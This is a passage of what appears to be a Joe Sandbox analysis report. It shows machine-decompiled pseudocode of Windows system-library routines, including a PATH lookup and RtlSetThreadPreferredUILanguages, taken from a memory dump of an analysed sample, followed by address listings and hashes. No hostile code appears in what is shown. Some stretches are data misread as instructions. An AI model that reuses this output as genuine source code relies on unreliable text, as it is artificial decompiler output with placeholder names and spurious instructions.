													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00ACF3E0(_t328, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t273 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t328 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx =  *0xb7575c;
													__eflags = __ebx - 0xb7575c;
													if(__ebx != 0xb7575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00ACF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xb7575c;
														} while (__ebx != 0xb7575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xb78478 & 0x0000ffff = E00ACF3E0(__edi,  *0xb7847c,  *0xb78478 & 0x0000ffff);
													__eax =  *0xb78478 & 0x0000ffff;
													__eax = ( *0xb78478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00B139F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xb76e58 & 0x0000ffff = E00ACF3E0(__edi,  *0xb76e5c,  *0xb76e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xb76e58 & 0x0000ffff;
													__eax = ( *0xb76e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t298 = _v16;
													_t314 = _v32;
													L29:
													_t288 = _t288 + 4;
													__eflags = _t288;
													_v56 = _t288;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t298 = _t298 + 1;
									_v16 = _t298;
									__eflags = _t298 - _v48;
								} while (_t298 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t247 =  *(_v60 + _t326 * 4);
						if(_t247 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t247 * 4 +  &M00AB2935))) {
							case 0:
								__ax =  *0xb78488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t314 =  &_v64;
								_v80 = E00AB2E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xb78480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb78480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00A9EEF0(0xb779a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00A9EB70(__ecx, 0xb779a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t221 = _v72;
											__eflags = _t221;
											if(_t221 != 0) {
												L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
											}
											_t222 = _v52;
											__eflags = _t222;
											if(_t222 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
													_t222 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t294 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xb77b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00A9EB70(__ecx, 0xb779a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t285);
										return E00ACB640(_t222, _t285, _v8 ^ _t338, _t314, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t314 =  &_v36;
									_t282 = E00AB2E3E(_t280,  &_v36);
									_t294 = _v36;
									_v76 = _t282;
								}
								if(_t294 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t294;
								}
								goto L14;
							case 6:
								__eax =  *0xb75764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xb78478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb78478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xb76e58 & 0x0000ffff;
								__eax = ( *0xb76e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t314 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t299 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("stosd");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t247;
					asm("stosd");
					_t248 = _t247 + _t247;
					asm("daa");
					asm("stosd");
					 *_t333 =  *_t333 + _t299;
					asm("es stosd");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t248;
					asm("stosd");
					 *0x1f00ab26 =  *0x1f00ab26 + _t248;
					_pop(_t289);
					asm("scasd");
					 *((intOrPtr*)(_t248 +  &_a1530200231)) =  *((intOrPtr*)(_t248 +  &_a1530200231)) + _t314;
					asm("scasd");
					 *_t314 =  *_t314 + _t248;
					 *((intOrPtr*)(_t289 - 0x54d78000)) =  *((intOrPtr*)(_t289 - 0x54d78000)) - _t338;
					asm("daa");
					asm("stosd");
					 *_t333 =  *_t333 + _t289;
					 *((intOrPtr*)(_t289 - 0x54d7b200)) =  *((intOrPtr*)(_t289 - 0x54d7b200)) - _t299;
					_a35 = _a35 + _t289;
					asm("stosd");
					_pop(_t290);
					asm("scasd");
					 *((intOrPtr*)(_t248 + _t289 +  &_a1546911911)) =  *((intOrPtr*)(_t248 + _t289 +  &_a1546911911)) + _t314 + _t314;
					asm("scasd");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xb5ff00);
					E00ADD08C(_t290, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t291 = _a12;
					__eflags = _t291;
					if(_t291 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t304 = _t255 * 0xc;
							_v48 = _t304;
							__eflags = _t291 -  *((intOrPtr*)(_t304 + 0xa61664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E00ACE5C0(_a8,  *((intOrPtr*)(_t304 + 0xa61668)), _t291);
									_t341 = _t341 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t336 = E00B051BE(_t291,  *((intOrPtr*)(_v48 + 0xa6166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t300 = _a4;
								__eflags = _t300;
								if(_t300 != 0) {
									_v36 = _t300;
									__eflags =  *_t300 - _t329;
									if( *_t300 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t300;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t300) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E00AB2AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t300 = _v36;
													goto L75;
												}
											} else {
												_t260 = E00A96600( *(_t317 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t300 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E00AB2C50(_t300, _a8, _t291, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t267 = E00AB2AE4( &_v36, _a8, _t291, _a16, _a20, _t336);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E00AB2C50(_v36, _a8, _t291, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E00AB2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t336;
					}
					L70:
					return E00ADD0D1(_t253);
				}
				L108:
			}




















































                                                    0x00ab2584
                                                    0x00ab2586
                                                    0x00ab2590
                                                    0x00ab2596
                                                    0x00ab2597
                                                    0x00ab2598
                                                    0x00ab2599
                                                    0x00ab259e
                                                    0x00ab25a4
                                                    0x00ab25a9
                                                    0x00ab25ac
                                                    0x00ab25ae
                                                    0x00ab25b1
                                                    0x00ab25b2
                                                    0x00ab25b5
                                                    0x00ab25b8
                                                    0x00ab25bb
                                                    0x00ab25bc
                                                    0x00ab25bf
                                                    0x00ab25c2
                                                    0x00ab25c5
                                                    0x00ab25c6
                                                    0x00ab25cb
                                                    0x00ab25ce
                                                    0x00ab25d8
                                                    0x00ab25dd
                                                    0x00ab25de
                                                    0x00ab25e1
                                                    0x00ab25e3
                                                    0x00ab25e9
                                                    0x00ab26da
                                                    0x00ab26da
                                                    0x00ab26dd
                                                    0x00ab26e2
                                                    0x00af5b56
                                                    0x00000000
                                                    0x00ab26e8
                                                    0x00ab26f9
                                                    0x00ab26fb
                                                    0x00ab26fe
                                                    0x00ab2700
                                                    0x00af5b60
                                                    0x00000000
                                                    0x00ab2706
                                                    0x00ab2706
                                                    0x00ab270a
                                                    0x00ab270a
                                                    0x00ab270d
                                                    0x00ab2713
                                                    0x00ab2716
                                                    0x00ab2718
                                                    0x00ab271c
                                                    0x00ab271e
                                                    0x00af5b6c
                                                    0x00af5b6f
                                                    0x00af5b7f
                                                    0x00af5b89
                                                    0x00af5b8e
                                                    0x00af5b93
                                                    0x00af5b96
                                                    0x00af5b9c
                                                    0x00af5ba0
                                                    0x00af5ba3
                                                    0x00af5bab
                                                    0x00af5bb0
                                                    0x00af5bb3
                                                    0x00af5bb3
                                                    0x00af5ba3
                                                    0x00ab2724
                                                    0x00ab2726
                                                    0x00ab2729
                                                    0x00ab272c
                                                    0x00ab279d
                                                    0x00ab279d
                                                    0x00ab27a0
                                                    0x00ab27a2
                                                    0x00000000
                                                    0x00ab272e
                                                    0x00ab272e
                                                    0x00ab2731
                                                    0x00ab2734
                                                    0x00ab2734
                                                    0x00ab2736
                                                    0x00af5bc1
                                                    0x00af5bc1
                                                    0x00af5bc4
                                                    0x00000000
                                                    0x00af5bca
                                                    0x00af5bca
                                                    0x00af5bcd
                                                    0x00000000
                                                    0x00af5bd3
                                                    0x00000000
                                                    0x00af5bd3
                                                    0x00af5bcd
                                                    0x00ab273c
                                                    0x00ab273c
                                                    0x00ab2742
                                                    0x00ab2747
                                                    0x00ab274a
                                                    0x00ab274d
                                                    0x00ab2750
                                                    0x00000000
                                                    0x00ab2756
                                                    0x00ab2756
                                                    0x00000000
                                                    0x00ab2902
                                                    0x00ab2908
                                                    0x00ab290b
                                                    0x00000000
                                                    0x00ab2911
                                                    0x00ab291c
                                                    0x00ab2921
                                                    0x00000000
                                                    0x00ab2921
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2880
                                                    0x00ab2887
                                                    0x00ab288c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2805
                                                    0x00ab280a
                                                    0x00ab2814
                                                    0x00ab2816
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab281e
                                                    0x00ab2821
                                                    0x00ab2823
                                                    0x00000000
                                                    0x00ab2829
                                                    0x00ab2829
                                                    0x00ab2831
                                                    0x00ab283c
                                                    0x00ab283e
                                                    0x00000000
                                                    0x00ab283e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab284e
                                                    0x00ab2850
                                                    0x00ab2851
                                                    0x00ab2854
                                                    0x00ab2857
                                                    0x00ab285a
                                                    0x00ab285c
                                                    0x00ab285d
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab275d
                                                    0x00ab2761
                                                    0x00000000
                                                    0x00ab2767
                                                    0x00ab276e
                                                    0x00ab2773
                                                    0x00ab2773
                                                    0x00ab2776
                                                    0x00ab2778
                                                    0x00ab277e
                                                    0x00ab277e
                                                    0x00ab2781
                                                    0x00ab2781
                                                    0x00ab2783
                                                    0x00ab2784
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5bd8
                                                    0x00af5bde
                                                    0x00af5be4
                                                    0x00af5be6
                                                    0x00af5be8
                                                    0x00af5be9
                                                    0x00af5bee
                                                    0x00af5bf8
                                                    0x00af5bff
                                                    0x00af5c01
                                                    0x00af5c04
                                                    0x00af5c07
                                                    0x00af5c0b
                                                    0x00af5c0d
                                                    0x00af5c0d
                                                    0x00af5c15
                                                    0x00af5c18
                                                    0x00af5c1b
                                                    0x00af5c1b
                                                    0x00af5c1e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab28c3
                                                    0x00ab28c8
                                                    0x00ab28d2
                                                    0x00ab28d4
                                                    0x00ab28d8
                                                    0x00ab28db
                                                    0x00af5c26
                                                    0x00af5c28
                                                    0x00af5c2d
                                                    0x00af5c2d
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5c34
                                                    0x00af5c36
                                                    0x00af5c49
                                                    0x00af5c4e
                                                    0x00af5c54
                                                    0x00af5c5b
                                                    0x00af5c5d
                                                    0x00af5c60
                                                    0x00ab2788
                                                    0x00ab2788
                                                    0x00ab278b
                                                    0x00ab278e
                                                    0x00ab278e
                                                    0x00ab278e
                                                    0x00ab2791
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2756
                                                    0x00ab2750
                                                    0x00000000
                                                    0x00ab2794
                                                    0x00ab2794
                                                    0x00ab2795
                                                    0x00ab2798
                                                    0x00ab2798
                                                    0x00000000
                                                    0x00ab2734
                                                    0x00ab272c
                                                    0x00ab2700
                                                    0x00ab25ef
                                                    0x00ab25ef
                                                    0x00ab25ef
                                                    0x00ab25f2
                                                    0x00ab25f8
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab25fe
                                                    0x00000000
                                                    0x00ab28e6
                                                    0x00ab28ec
                                                    0x00ab28ef
                                                    0x00ab28f5
                                                    0x00ab28f8
                                                    0x00ab28f8
                                                    0x00000000
                                                    0x00ab28f8
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2866
                                                    0x00ab2866
                                                    0x00ab2876
                                                    0x00ab2879
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab27e0
                                                    0x00ab27e7
                                                    0x00ab27e9
                                                    0x00ab27eb
                                                    0x00af5afd
                                                    0x00000000
                                                    0x00af5afd
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2633
                                                    0x00ab2638
                                                    0x00ab263b
                                                    0x00ab263c
                                                    0x00ab263e
                                                    0x00ab2640
                                                    0x00ab2642
                                                    0x00ab2647
                                                    0x00ab2649
                                                    0x00ab264e
                                                    0x00ab2650
                                                    0x00ab2653
                                                    0x00ab2659
                                                    0x00ab26a2
                                                    0x00ab26a7
                                                    0x00ab26ac
                                                    0x00ab26b2
                                                    0x00af5b11
                                                    0x00af5b15
                                                    0x00af5b17
                                                    0x00000000
                                                    0x00ab26b8
                                                    0x00ab26b8
                                                    0x00ab26ba
                                                    0x00ab27a6
                                                    0x00ab27a6
                                                    0x00ab27a9
                                                    0x00ab27ab
                                                    0x00ab27b9
                                                    0x00ab27b9
                                                    0x00ab27be
                                                    0x00ab27c1
                                                    0x00ab27c3
                                                    0x00ab27c5
                                                    0x00ab27c7
                                                    0x00af5c74
                                                    0x00af5c79
                                                    0x00af5c79
                                                    0x00ab27c7
                                                    0x00000000
                                                    0x00ab26c0
                                                    0x00ab26c0
                                                    0x00ab26c3
                                                    0x00ab26c6
                                                    0x00ab26c6
                                                    0x00ab26c9
                                                    0x00ab26c9
                                                    0x00000000
                                                    0x00ab26c9
                                                    0x00ab26ba
                                                    0x00ab265b
                                                    0x00ab265b
                                                    0x00ab265e
                                                    0x00ab2667
                                                    0x00ab266d
                                                    0x00ab2677
                                                    0x00ab267c
                                                    0x00ab267f
                                                    0x00ab2681
                                                    0x00af5b49
                                                    0x00af5b4e
                                                    0x00ab27cd
                                                    0x00ab27d0
                                                    0x00ab27d1
                                                    0x00ab27d2
                                                    0x00ab27d4
                                                    0x00ab27dd
                                                    0x00ab2687
                                                    0x00ab2687
                                                    0x00ab268a
                                                    0x00ab268b
                                                    0x00ab268e
                                                    0x00ab268f
                                                    0x00ab2691
                                                    0x00ab2696
                                                    0x00ab2698
                                                    0x00ab269d
                                                    0x00ab269f
                                                    0x00000000
                                                    0x00ab269f
                                                    0x00ab2681
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2846
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2605
                                                    0x00ab260a
                                                    0x00ab260c
                                                    0x00ab2611
                                                    0x00ab2616
                                                    0x00ab2619
                                                    0x00ab2619
                                                    0x00ab261e
                                                    0x00000000
                                                    0x00ab2624
                                                    0x00ab2627
                                                    0x00ab2627
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5b1f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2894
                                                    0x00ab289b
                                                    0x00ab289d
                                                    0x00ab28a1
                                                    0x00af5b2b
                                                    0x00af5b2e
                                                    0x00af5b2e
                                                    0x00ab28a7
                                                    0x00ab28a9
                                                    0x00af5b04
                                                    0x00af5b09
                                                    0x00af5b09
                                                    0x00af5b09
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5b35
                                                    0x00af5b3c
                                                    0x00ab28fb
                                                    0x00ab28fb
                                                    0x00ab26cc
                                                    0x00ab26cc
                                                    0x00ab26d0
                                                    0x00000000
                                                    0x00ab26d2
                                                    0x00ab26d2
                                                    0x00000000
                                                    0x00ab26d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab25fe
                                                    0x00ab292d
                                                    0x00ab292f
                                                    0x00ab2930
                                                    0x00ab2935
                                                    0x00ab2937
                                                    0x00ab2938
                                                    0x00ab293b
                                                    0x00ab293c
                                                    0x00ab293e
                                                    0x00ab293f
                                                    0x00ab2940
                                                    0x00ab2942
                                                    0x00ab2944
                                                    0x00ab2947
                                                    0x00ab2948
                                                    0x00ab294e
                                                    0x00ab294f
                                                    0x00ab2950
                                                    0x00ab2957
                                                    0x00ab2958
                                                    0x00ab295a
                                                    0x00ab2962
                                                    0x00ab2963
                                                    0x00ab2964
                                                    0x00ab2966
                                                    0x00ab296c
                                                    0x00ab296f
                                                    0x00ab2972
                                                    0x00ab2973
                                                    0x00ab2974
                                                    0x00ab297b
                                                    0x00ab297e
                                                    0x00ab297f
                                                    0x00ab2980
                                                    0x00ab2981
                                                    0x00ab2982
                                                    0x00ab2983
                                                    0x00ab2984
                                                    0x00ab2985
                                                    0x00ab2986
                                                    0x00ab2987
                                                    0x00ab2988
                                                    0x00ab2989
                                                    0x00ab298a
                                                    0x00ab298b
                                                    0x00ab298c
                                                    0x00ab298d
                                                    0x00ab298e
                                                    0x00ab298f
                                                    0x00ab2990
                                                    0x00ab2992
                                                    0x00ab2997
                                                    0x00ab29a3
                                                    0x00ab29a6
                                                    0x00ab29ab
                                                    0x00ab29ad
                                                    0x00ab29b0
                                                    0x00ab29b2
                                                    0x00af5c80
                                                    0x00ab29b8
                                                    0x00ab29b8
                                                    0x00ab29bb
                                                    0x00ab29c0
                                                    0x00ab29c5
                                                    0x00ab29c6
                                                    0x00ab29c6
                                                    0x00ab29c9
                                                    0x00ab29cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab29cd
                                                    0x00ab29d0
                                                    0x00ab29d9
                                                    0x00ab29db
                                                    0x00ab29dd
                                                    0x00ab2a7f
                                                    0x00ab2a84
                                                    0x00ab2a87
                                                    0x00ab2a89
                                                    0x00af5ca1
                                                    0x00af5ca3
                                                    0x00000000
                                                    0x00ab2a8f
                                                    0x00ab2a8f
                                                    0x00000000
                                                    0x00ab2a8f
                                                    0x00000000
                                                    0x00ab29e3
                                                    0x00ab29e3
                                                    0x00ab29e3
                                                    0x00000000
                                                    0x00ab29e3
                                                    0x00ab29dd
                                                    0x00000000
                                                    0x00ab29db
                                                    0x00ab29e6
                                                    0x00ab29e9
                                                    0x00ab29eb
                                                    0x00ab29ed
                                                    0x00ab29f3
                                                    0x00ab29f5
                                                    0x00ab29f8
                                                    0x00ab29fa
                                                    0x00ab2a97
                                                    0x00ab2a9a
                                                    0x00ab2a9d
                                                    0x00ab2add
                                                    0x00000000
                                                    0x00ab2a9f
                                                    0x00ab2aa2
                                                    0x00ab2aa5
                                                    0x00ab2aa8
                                                    0x00ab2aab
                                                    0x00af5cab
                                                    0x00af5caf
                                                    0x00af5cc5
                                                    0x00af5cda
                                                    0x00af5cdc
                                                    0x00af5cdf
                                                    0x00af5ce5
                                                    0x00000000
                                                    0x00af5ceb
                                                    0x00af5ced
                                                    0x00af5cee
                                                    0x00000000
                                                    0x00af5cee
                                                    0x00af5cb1
                                                    0x00af5cb4
                                                    0x00af5cb9
                                                    0x00af5cbb
                                                    0x00000000
                                                    0x00af5cbd
                                                    0x00af5cbd
                                                    0x00000000
                                                    0x00af5cbd
                                                    0x00af5cbb
                                                    0x00ab2ab1
                                                    0x00ab2ab1
                                                    0x00ab2ac4
                                                    0x00ab2ac6
                                                    0x00ab2ac6
                                                    0x00000000
                                                    0x00ab2ac6
                                                    0x00ab2aab
                                                    0x00000000
                                                    0x00ab2a00
                                                    0x00ab2a09
                                                    0x00ab2a0e
                                                    0x00ab2a21
                                                    0x00ab2a24
                                                    0x00ab2a35
                                                    0x00ab2a3a
                                                    0x00ab2a3d
                                                    0x00ab2a42
                                                    0x00ab2a59
                                                    0x00ab2a59
                                                    0x00ab2a5c
                                                    0x00ab2a5f
                                                    0x00ab2a5f
                                                    0x00ab29fa
                                                    0x00ab29f3
                                                    0x00ab2a64
                                                    0x00ab2a64
                                                    0x00ab2a6b
                                                    0x00ab2a6b
                                                    0x00ab2a6d
                                                    0x00ab2a72
                                                    0x00ab2a72
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PATH
                                                    • API String ID: 0-1036084923
                                                    • Opcode ID: 29314f0919670f347306b6fc254092e20bcea3caca86a95b8a98b544327ad313
                                                    • Instruction ID: 16216ca0713dfd187fa974bae8a4b7300a2294ae62e6b333518c495759b21df9
                                                    • Opcode Fuzzy Hash: 29314f0919670f347306b6fc254092e20bcea3caca86a95b8a98b544327ad313
                                                    • Instruction Fuzzy Hash: B4C19D71E00219AFCB24DFA9D981BEDB7B9FF48700F14402AE505BB252EB74A941CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E00ABFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00A9EEF0(0xb77b60);
					_t134 =  *0xb77b84; // 0x771a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xb77b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xb77b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00A96D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00A976E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00B28938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00A8B150();
													}
													_t116 = E00B26D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00A975CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xb78638; // 0x0
